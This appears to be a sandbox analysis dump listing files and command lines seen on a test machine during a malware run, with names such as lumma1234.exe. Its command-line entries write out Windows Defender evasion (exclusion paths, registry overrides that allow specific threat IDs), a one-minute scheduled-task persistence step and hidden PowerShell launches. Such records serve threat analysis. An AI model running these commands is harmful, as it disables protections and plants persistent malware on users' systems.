file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\PDown.dll |
file | C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\DsSysRepair.dll |
file | C:\Users\Public\Desktop\360 Total Security.lnk |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\modules\360PatchMgr.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\PatchUp.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\LeakFixHelper64.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360WifiProtect.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\filemon\AVCheck.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\DesktopPlus\Utils\360ScreenCapture.exe |
file | C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360DrvMgr\ScriptExecute.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SoftMgrLite.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\scanbase.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Repair.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\360TSCommon64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\deepscan\DsRes64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\PHPEX.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\360Base64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\AVE\AVEngine.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\DsRes64.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\CrashReport.dll |
file | C:\Users\test22\Desktop\360 Total Security.lnk |
file | C:\Users\Public\Desktop\ゲームブースター.lnk |
file | C:\Users\Public\Desktop\遊戲加速.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Sandbox.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\Public\Desktop\Desktop Plus.lnk |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\Public\Desktop\360 Total Security.lnk |
file | C:\Users\Public\Desktop\360安全衛士.lnk |
file | C:\Users\Public\Desktop\Game Booster.lnk |
file | C:\Users\Public\Desktop\Tăng tốc trò chơi.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Patch Up.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\Users\Public\Desktop\Spiel-Booster.lnk |
file | C:\Users\Public\Desktop\Acelerador de juegos.lnk |
file | C:\Users\Public\Desktop\Aceleração de Jogos.lnk |
file | C:\Users\Public\Desktop\游戏加速.lnk |
file | C:\Users\Public\Desktop\桌面助手.lnk |
file | C:\Users\Public\Desktop\Accelerazione Giochi.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\Public\Desktop\Przyspieszacz gier.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Uninstall.lnk |
file | C:\Users\Public\Desktop\Ускорение игр.lnk |
file | C:\Users\Public\Desktop\Oyun Hızlandırıcı.lnk |
cmdline | powershell start-process -WindowStyle Hidden gpupdate.exe /force |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force |
cmdline | cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force |
cmdline | "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F |
cmdline | forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" |
cmdline | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force |
file | C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe |
file | C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe |
file | C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe |
file | C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe |
file | C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe |
file | C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe |
file | C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe |
file | C:\Users\test22\Pictures\1Cp24GDX3JU3iT5NEvx8jPp9.exe |
file | C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\CrashReport.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ToolBox.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\safemon\UDiskScanEngine.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\commonbase.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLLauncher.dll |
file | C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\SimpleIME.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\sweeper\SysSweeper.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\AVE\360KPBase.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\deepscan\DsRes.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360boxld.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ja\AntiAdwa.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\QVM\360AQVM.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\deepscan\DsRes.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\AntiAdwa.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\safemon\SelfProtectAPI2.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\ipc\yhregd.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\safemon\webprotection_firefox\plugins\nptswp.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\ipc\filemgr.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\UrlSettings.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\dynlenv.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360AntiHacker.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360DrvMgr\DrvmgrCore.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\gamemode.tpi |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\safemon\SelfProtectAPI2.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\DesktopPlus\Utils\360ScreenCapture.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\spsafe.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\en\deepscan\DsRes.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\deepscan\cloudsec3.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\fr\ipc\appd.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\ipc\NetDefender.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\WDPayPro.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\safemon\chrome\360webshield.exe.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\safemon\chrome\360webshield.exe.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\DsRes.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\safemon\360SPTool.exe.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\SiteUIProxy.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\netmon\netdrv\60\360netmon_60.sys |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\AntiAdwa.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHSafeScanner.exe |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\FastAnimation.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\qex.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\UDiskScanEngine.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\sbx.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360calaInt.dll |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\AntiAdwa.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\safemon\spsafe.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ja\safemon\safemon.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\safemon\Safemon.dll.locale |
file | C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360hvm.dll |